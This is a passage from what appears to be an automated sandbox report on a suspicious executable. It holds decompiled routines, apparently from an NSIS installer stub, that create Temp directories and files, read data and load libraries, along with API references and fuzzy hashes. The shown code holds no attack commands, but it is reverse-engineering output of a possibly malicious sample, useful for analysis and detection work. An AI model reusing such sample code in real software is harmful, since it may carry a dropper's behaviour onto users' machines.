                                                                                                						_push(0xfffffff6);
                                                                                                						goto L14;
                                                                                                					}
                                                                                                					L4:
                                                                                                					_t32 = GetProcAddress(_t29,  *(_t33 + 8));
                                                                                                					if(_t32 == _t26) {
                                                                                                						E00404CC9(0xfffffff7,  *(_t33 + 8));
                                                                                                					} else {
                                                                                                						 *(_t33 - 4) = _t26;
                                                                                                						if( *((intOrPtr*)(_t33 - 0x1c)) == _t26) {
                                                                                                							 *_t32( *((intOrPtr*)(_t33 - 0x34)), 0x400, 0x42f000, 0x40af78, "��B"); // executed
                                                                                                						} else {
                                                                                                							E00401423( *((intOrPtr*)(_t33 - 0x1c)));
                                                                                                							if( *_t32() != 0) {
                                                                                                								 *(_t33 - 4) = 1;
                                                                                                							}
                                                                                                						}
                                                                                                					}
                                                                                                					if( *((intOrPtr*)(_t33 - 0x18)) == _t26) {
                                                                                                						FreeLibrary(_t29);
                                                                                                					}
                                                                                                					goto L15;
                                                                                                				}
                                                                                                				_t25 = GetModuleHandleA(_t31); // executed
                                                                                                				_t29 = _t25;
                                                                                                				if(_t29 != __ebx) {
                                                                                                					goto L4;
                                                                                                				}
                                                                                                				goto L3;
                                                                                                			}











                                                                                                APIs
                                                                                                • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F7C
                                                                                                  • Part of subcall function 00404CC9: lstrlenA.KERNEL32(004297B0,00000000,0041B732,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000,?), ref: 00404D02
                                                                                                  • Part of subcall function 00404CC9: lstrlenA.KERNEL32(00402F9F,004297B0,00000000,0041B732,73BCEA30,?,?,?,?,?,?,?,?,?,00402F9F,00000000), ref: 00404D12
                                                                                                  • Part of subcall function 00404CC9: lstrcatA.KERNEL32(004297B0,00402F9F,00402F9F,004297B0,00000000,0041B732,73BCEA30), ref: 00404D25
                                                                                                  • Part of subcall function 00404CC9: SetWindowTextA.USER32(004297B0,004297B0), ref: 00404D37
                                                                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404D5D
                                                                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404D77
                                                                                                  • Part of subcall function 00404CC9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404D85
                                                                                                • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401F8C
                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 00401F9C
                                                                                                • FreeLibrary.KERNEL32(00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00401FF9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                                • String ID: B
                                                                                                • API String ID: 2987980305-3806887055
                                                                                                • Opcode ID: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                                                                                • Instruction ID: a273586f2596c922aa8c6de030caecb0164783ff06d74c4b05909b62d3698487
                                                                                                • Opcode Fuzzy Hash: d7593822058d6da3c5713086c5ed2afad92f262bec81073bd949cd63f8a168fb
                                                                                                • Instruction Fuzzy Hash: AA11EB72908215E7CF107FA5CD89EAE75B06B40359F20423BF611B62E0C77D4941D65E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E004015B3(struct _SECURITY_ATTRIBUTES* __ebx) {
                                                                                                				struct _SECURITY_ATTRIBUTES** _t10;
                                                                                                				int _t19;
                                                                                                				struct _SECURITY_ATTRIBUTES* _t20;
                                                                                                				signed char _t22;
                                                                                                				struct _SECURITY_ATTRIBUTES* _t23;
                                                                                                				CHAR* _t25;
                                                                                                				struct _SECURITY_ATTRIBUTES** _t29;
                                                                                                				void* _t30;
                                                                                                
                                                                                                				_t23 = __ebx;
                                                                                                				_t25 = E004029E8(0xfffffff0);
                                                                                                				_t10 = E004054B2(_t25);
                                                                                                				_t27 = _t10;
                                                                                                				if(_t10 != __ebx) {
                                                                                                					do {
                                                                                                						_t29 = E00405449(_t27, 0x5c);
                                                                                                						 *_t29 = _t23;
                                                                                                						 *((char*)(_t30 + 0xb)) =  *_t29;
                                                                                                						_t19 = CreateDirectoryA(_t25, _t23); // executed
                                                                                                						if(_t19 == 0) {
                                                                                                							if(GetLastError() != 0xb7) {
                                                                                                								L4:
                                                                                                								 *((intOrPtr*)(_t30 - 4)) =  *((intOrPtr*)(_t30 - 4)) + 1;
                                                                                                							} else {
                                                                                                								_t22 = GetFileAttributesA(_t25); // executed
                                                                                                								if((_t22 & 0x00000010) == 0) {
                                                                                                									goto L4;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						_t20 =  *((intOrPtr*)(_t30 + 0xb));
                                                                                                						 *_t29 = _t20;
                                                                                                						_t27 =  &(_t29[0]);
                                                                                                					} while (_t20 != _t23);
                                                                                                				}
                                                                                                				if( *((intOrPtr*)(_t30 - 0x20)) == _t23) {
                                                                                                					_push(0xfffffff5);
                                                                                                					E00401423();
                                                                                                				} else {
                                                                                                					E00401423(0xffffffe6);
                                                                                                					E0040592B("C:\\Users\\jones\\AppData\\Local\\Temp", _t25);
                                                                                                					SetCurrentDirectoryA(_t25); // executed
                                                                                                				}
                                                                                                				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t30 - 4));
                                                                                                				return 0;
                                                                                                			}












                                                                                                APIs
                                                                                                  • Part of subcall function 004054B2: CharNextA.USER32(dR@,?,0042B3E0,00000000,00405516,0042B3E0,0042B3E0,?,?,00000000,00405264,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,00000000), ref: 004054C0
                                                                                                  • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054C5
                                                                                                  • Part of subcall function 004054B2: CharNextA.USER32(00000000), ref: 004054D4
                                                                                                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                                                                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                                                                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                                                                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 00401622
                                                                                                Strings
                                                                                                • C:\Users\user\AppData\Local\Temp, xrefs: 00401617
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                • API String ID: 3751793516-47812868
                                                                                                • Opcode ID: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                                                                                • Instruction ID: 0fc8515a6fa1eb0c4cba02d173a6c2760af3d5d18bb88fe9e963a679bbf3bb3f
                                                                                                • Opcode Fuzzy Hash: 86f17882b044f620b79a71e3cf6d3ab2ba10f04d484553161baeb63a16b0f5ca
                                                                                                • Instruction Fuzzy Hash: 98012631908140ABDB117FB62C44EBF2BB0EE56365728063FF491B22E2C23C4842D62E
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00405631(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                                				signed int _t11;
                                                                                                				int _t14;
                                                                                                				signed int _t16;
                                                                                                				void* _t19;
                                                                                                				CHAR* _t20;
                                                                                                
                                                                                                				_t20 = _a4;
                                                                                                				_t19 = 0x64;
                                                                                                				while(1) {
                                                                                                					_t19 = _t19 - 1;
                                                                                                					_a4 = 0x61736e;
                                                                                                					_t11 = GetTickCount();
                                                                                                					_t16 = 0x1a;
                                                                                                					_a6 = _a6 + _t11 % _t16;
                                                                                                					_t14 = GetTempFileNameA(_a8,  &_a4, 0, _t20); // executed
                                                                                                					if(_t14 != 0) {
                                                                                                						break;
                                                                                                					}
                                                                                                					if(_t19 != 0) {
                                                                                                						continue;
                                                                                                					}
                                                                                                					 *_t20 =  *_t20 & 0x00000000;
                                                                                                					return _t14;
                                                                                                				}
                                                                                                				return _t20;
                                                                                                			}









                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00405644
                                                                                                • GetTempFileNameA.KERNELBASE(?,0061736E,00000000,?), ref: 0040565E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: CountFileNameTempTick
                                                                                                • String ID: "C:\Users\user\Desktop\xxTzyGLZx5.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                • API String ID: 1716503409-3468531726
                                                                                                • Opcode ID: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                • Instruction ID: 4df4b8b99f59c83ab7109897de74f33533764e09c55b4925cc875bb6e1137cb6
                                                                                                • Opcode Fuzzy Hash: fc5e126f8815d4696b9f295c06fae67d9d4e63728d0dbdda5093f58b42bfadad
                                                                                                • Instruction Fuzzy Hash: 20F020323082087BEB104E19EC04F9B7FA9DF91760F14C02BFA48AA1C0C2B1994887A9
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6EDC296D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: CreateFile
                                                                                                • String ID:
                                                                                                • API String ID: 823142352-0
                                                                                                • Opcode ID: f239004ddc35d2f836f68407aa07f08af9ef5c1eec1bc132619eb1f8de5f5f83
                                                                                                • Instruction ID: fc72ba373e7b5b6fc1d19f863d08a65151f9d29a684bf11f4d5c93a962724f22
                                                                                                • Opcode Fuzzy Hash: f239004ddc35d2f836f68407aa07f08af9ef5c1eec1bc132619eb1f8de5f5f83
                                                                                                • Instruction Fuzzy Hash: C4612935E50208EADB50DBE4E951BEDB7B9BF48B54F205416E514EB2E0EB700E40DB16
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 84%
                                                                                                			E004030AF(void* __eflags) {
                                                                                                				void* _t2;
                                                                                                				void* _t5;
                                                                                                				CHAR* _t6;
                                                                                                
                                                                                                				_t6 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
                                                                                                				E00405B89(_t6);
                                                                                                				_t2 = E0040548B(_t6);
                                                                                                				if(_t2 != 0) {
                                                                                                					E0040541E(_t6);
                                                                                                					CreateDirectoryA(_t6, 0); // executed
                                                                                                					_t5 = E00405631("1033", _t6); // executed
                                                                                                					return _t5;
                                                                                                				} else {
                                                                                                					return _t2;
                                                                                                				}
                                                                                                			}







                                                                                                APIs
                                                                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                                                                  • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                                                                  • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\xxTzyGLZx5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                                                                • CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 004030D0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 4115351271-517883005
                                                                                                • Opcode ID: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                                                                                • Instruction ID: aa9e03880385e1d2cf47b50332cae3b8ca0df9fc70cebf3d54c0219f352de5d1
                                                                                                • Opcode Fuzzy Hash: d3ac2fd6cae103097c511f100747324c269b86177de792172be06caaae51c051
                                                                                                • Instruction Fuzzy Hash: 50D0C911517D3029CA51332A3D06FEF191C8F4776AFA5507BF808B60C64B7C2A8349EE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 69%
                                                                                                			E00401389(signed int _a4) {
                                                                                                				intOrPtr* _t6;
                                                                                                				void* _t8;
                                                                                                				void* _t10;
                                                                                                				signed int _t11;
                                                                                                				void* _t12;
                                                                                                				intOrPtr _t15;
                                                                                                				signed int _t16;
                                                                                                				signed int _t17;
                                                                                                				void* _t18;
                                                                                                
                                                                                                				_t17 = _a4;
                                                                                                				while(_t17 >= 0) {
                                                                                                					_t15 =  *0x42eb90; // 0x600004
                                                                                                					_t6 = _t17 * 0x1c + _t15;
                                                                                                					if( *_t6 == 1) {
                                                                                                						break;
                                                                                                					}
                                                                                                					_push(_t6); // executed
                                                                                                					_t8 = E00401434(); // executed
                                                                                                					if(_t8 == 0x7fffffff) {
                                                                                                						return 0x7fffffff;
                                                                                                					}
                                                                                                					_t10 = E0040136D(_t8);
                                                                                                					if(_t10 != 0) {
                                                                                                						_t11 = _t10 - 1;
                                                                                                						_t16 = _t17;
                                                                                                						_t17 = _t11;
                                                                                                						_t12 = _t11 - _t16;
                                                                                                					} else {
                                                                                                						_t12 = _t10 + 1;
                                                                                                						_t17 = _t17 + 1;
                                                                                                					}
                                                                                                					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                                						 *0x42e34c =  *0x42e34c + _t12;
                                                                                                						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42e34c, 0x7530,  *0x42e334), 0);
                                                                                                					}
                                                                                                				}
                                                                                                				return 0;
                                                                                                			}













                                                                                                APIs
                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                                                                                • Instruction ID: 8223ec958efd2c964e321ebce6dca8e406ed2778dd364e0d2667d4e2a9ef0db3
                                                                                                • Opcode Fuzzy Hash: cf7b3020d7635a73a7f034f7f9c2b240c5e2222d46fcf66a2415134205071e91
                                                                                                • Instruction Fuzzy Hash: FE01F4317242109BE7299B799D04B6A36D8E710325F14453FF955F72F1D678DC028B4D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 68%
                                                                                                			E00405602(CHAR* _a4, long _a8, long _a12) {
                                                                                                				signed int _t5;
                                                                                                				void* _t6;
                                                                                                
                                                                                                				_t5 = GetFileAttributesA(_a4); // executed
                                                                                                				asm("sbb ecx, ecx");
                                                                                                				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                				return _t6;
                                                                                                			}






                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(00000003,00402C4B,C:\Users\user\Desktop\xxTzyGLZx5.exe,80000000,00000003), ref: 00405606
                                                                                                • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate
                                                                                                • String ID:
                                                                                                • API String ID: 415043291-0
                                                                                                • Opcode ID: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                • Instruction ID: 518821d5ca0a74227a37217cadb520a33af9faec79942caa6648154b48e23ab6
                                                                                                • Opcode Fuzzy Hash: f96d5d8e90d761c4e0dddf78ec48930a46771e4615b27f2c581d09f506512028
                                                                                                • Instruction Fuzzy Hash: DDD09E71658301AFEF098F20DE1AF2E7AA2EB84B01F10962CB646940E0D6715C15DB16
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E004055E3(CHAR* _a4) {
                                                                                                				signed char _t3;
                                                                                                
                                                                                                				_t3 = GetFileAttributesA(_a4); // executed
                                                                                                				if(_t3 != 0xffffffff) {
                                                                                                					return SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                                				}
                                                                                                				return _t3;
                                                                                                			}





                                                                                                APIs
                                                                                                • GetFileAttributesA.KERNELBASE(?,004053EE,?,?,?), ref: 004055E7
                                                                                                • SetFileAttributesA.KERNEL32(?,00000000), ref: 004055F9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                • Instruction ID: a5fed976df330e3c9be42370ef6aa70fcab56a8ff4bebce8f9239a379cf4a5bf
                                                                                                • Opcode Fuzzy Hash: 499c41a265c8c72c251eb99c81a2d8ea197c0ca55525d81af5d9f53b6a62e1c9
                                                                                                • Instruction Fuzzy Hash: 77C04CB1808501BBD6015B34DF0D85F7B66EF50721B108B35F66AE04F4C7355C66EB1A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00403066(void* _a4, long _a8) {
                                                                                                				int _t6;
                                                                                                				long _t10;
                                                                                                
                                                                                                				_t10 = _a8;
                                                                                                				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
                                                                                                				if(_t6 == 0 || _a8 != _t10) {
                                                                                                					return 0;
                                                                                                				} else {
                                                                                                					return 1;
                                                                                                				}
                                                                                                			}






                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402E93,000000FF,00000004,00000000,00000000,00000000), ref: 0040307D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                                                                                • Instruction ID: db7eb9ea6f1a12052482ff51ad32c18cee35d2953ec2f1fcf73c5929b0b6aa83
                                                                                                • Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
                                                                                                • Instruction Fuzzy Hash: 84E08631251119BBCF105E719C04E9B3B5CEB053A5F008033FA55E5190D530DA50DBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 100%
                                                                                                			E00403098(long _a4) {
                                                                                                				long _t2;
                                                                                                
                                                                                                				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
                                                                                                				return _t2;
                                                                                                			}





                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402DD2,00032FE4), ref: 004030A6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.675084416.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000001.00000002.675078765.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675094435.0000000000407000.00000002.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675103409.0000000000409000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675141346.000000000042C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675150844.0000000000434000.00000004.00020000.sdmp
                                                                                                • Associated: 00000001.00000002.675162007.0000000000437000.00000002.00020000.sdmp
                                                                                                Similarity
                                                                                                • API ID: FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 973152223-0
                                                                                                • Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                                                                                • Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
                                                                                                • Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
                                                                                                • Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                C-Code - Quality: 96%
                                                                                                			E00404E07(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                				struct HWND__* _v8;
                                                                                                				long _v12;
                                                                                                				struct tagRECT _v28;
                                                                                                				void* _v36;
                                                                                                				signed int _v40;
                                                                                                				int _v44;
                                                                                                				int _v48;
                                                                                                				signed int _v52;
                                                                                                				int _v56;
                                                                                                				void* _v60;
                                                                                                				void* _v68;
                                                                                                				void* __ebx;
                                                                                                				void* __edi;
                                                                                                				void* __esi;
                                                                                                				long _t87;
                                                                                                				unsigned int _t92;
                                                                                                				unsigned int _t93;
                                                                                                				int _t94;
                                                                                                				int _t95;
                                                                                                				long _t98;
                                                                                                				void* _t101;
                                                                                                				intOrPtr _t123;
                                                                                                				struct HWND__* _t127;
                                                                                                				int _t149;
                                                                                                				int _t150;
                                                                                                				struct HWND__* _t154;
                                                                                                				struct HWND__* _t158;
                                                                                                				struct HMENU__* _t160;
                                                                                                				long _t162;
                                                                                                				void* _t163;
                                                                                                				short* _t164;
                                                                                                
                                                                                                				_t154 =  *0x42e344; // 0x0
                                                                                                				_t149 = 0;
                                                                                                				_v8 = _t154;
                                                                                                				if(_a8 != 0x110) {
                                                                                                					__eflags = _a8 - 0x405;
                                                                                                					if(_a8 == 0x405) {
                                                                                                						CloseHandle(CreateThread(0, 0, E00404D9B, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
                                                                                                					}
                                                                                                					__eflags = _a8 - 0x111;
                                                                                                					if(_a8 != 0x111) {
                                                                                                						L17:
                                                                                                						__eflags = _a8 - 0x404;
                                                                                                						if(_a8 != 0x404) {
                                                                                                							L25:
                                                                                                							__eflags = _a8 - 0x7b;
                                                                                                							if(_a8 != 0x7b) {
                                                                                                								goto L20;
                                                                                                							}
                                                                                                							__eflags = _a12 - _t154;
                                                                                                							if(_a12 != _t154) {
                                                                                                								goto L20;
                                                                                                							}
                                                                                                							_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
                                                                                                							__eflags = _t87 - _t149;
                                                                                                							_a8 = _t87;
                                                                                                							if(_t87 <= _t149) {
                                                                                                								L37:
                                                                                                								return 0;
                                                                                                							}
                                                                                                							_t160 = CreatePopupMenu();
                                                                                                							AppendMenuA(_t160, _t149, 1, E0040594D(_t149, _t154, _t160, _t149, 0xffffffe1));
                                                                                                							_t92 = _a16;
                                                                                                							__eflags = _t92 - 0xffffffff;
                                                                                                							if(_t92 != 0xffffffff) {
                                                                                                								_t150 = _t92;
                                                                                                								_t93 = _t92 >> 0x10;
                                                                                                								__eflags = _t93;
                                                                                                								_t94 = _t93;
                                                                                                							} else {
                                                                                                								GetWindowRect(_t154,  &_v28);
                                                                                                								_t150 = _v28.left;
                                                                                                								_t94 = _v28.top;
                                                                                                							}
                                                                                                							_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
                                                                                                							_t162 = 1;
                                                                                                							__eflags = _t95 - 1;
